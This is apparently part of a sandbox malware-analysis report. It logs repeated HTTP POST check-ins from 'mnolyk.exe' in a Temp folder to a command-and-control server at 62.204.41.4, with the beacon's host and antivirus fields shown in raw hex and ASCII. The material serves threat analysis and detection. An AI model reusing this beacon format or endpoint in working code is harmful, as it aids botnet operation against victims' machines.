                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            544 | 192.168.2.4 | 50239 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:56.854078054 CET | 732 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:56.919526100 CET | 733 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            545 | 192.168.2.4 | 50240 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:57.100033998 CET | 733 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.169399023 CET | 734 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            546 | 192.168.2.4 | 50241 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:57.341358900 CET | 734 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.406874895 CET | 735 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            547 | 192.168.2.4 | 50242 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:57.575391054 CET | 735 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.638583899 CET | 736 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            548 | 192.168.2.4 | 50243 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:57.826941013 CET | 736 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:57.892657042 CET | 737 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            549 | 192.168.2.4 | 50244 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:58.067517042 CET | 737 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.131375074 CET | 738 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            55 | 192.168.2.4 | 49750 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:40.228697062 CET | 244 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.292813063 CET | 244 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            550 | 192.168.2.4 | 50245 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:58.312452078 CET | 738 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.376530886 CET | 739 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            551 | 192.168.2.4 | 50246 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:58.556274891 CET | 739 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.625153065 CET | 740 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            552 | 192.168.2.4 | 50247 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:58.822361946 CET | 740 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:58.888118029 CET | 740 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            553 | 192.168.2.4 | 50248 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:59.059890032 CET | 741 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.124011993 CET | 741 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            554 | 192.168.2.4 | 50249 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:59.294790030 CET | 742 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.359090090 CET | 742 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            555 | 192.168.2.4 | 50250 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:59.546505928 CET | 743 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.611418009 CET | 743 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            556 | 192.168.2.4 | 50251 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:39:59.807890892 CET | 744 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:59.873145103 CET | 744 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            557 | 192.168.2.4 | 50252 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:00.048499107 CET | 745 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.112935066 CET | 745 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            558 | 192.168.2.4 | 50253 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:00.282449961 CET | 746 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.347563028 CET | 746 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            559 | 192.168.2.4 | 50254 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:00.514766932 CET | 747 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.578994989 CET | 747 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            56 | 192.168.2.4 | 49751 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:40.464030027 CET | 245 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:40.527021885 CET  245                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:40 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            560         192.168.2.4  50255        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:00.759371996 CET  748                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:00.823412895 CET  748                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:00 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                            561         192.168.2.4  50256        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp                           kBytes transferred  Direction  Data
                            Feb 8, 2023 17:40:01.011214018 CET  749                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:01.076416016 CET  749                 IN         HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
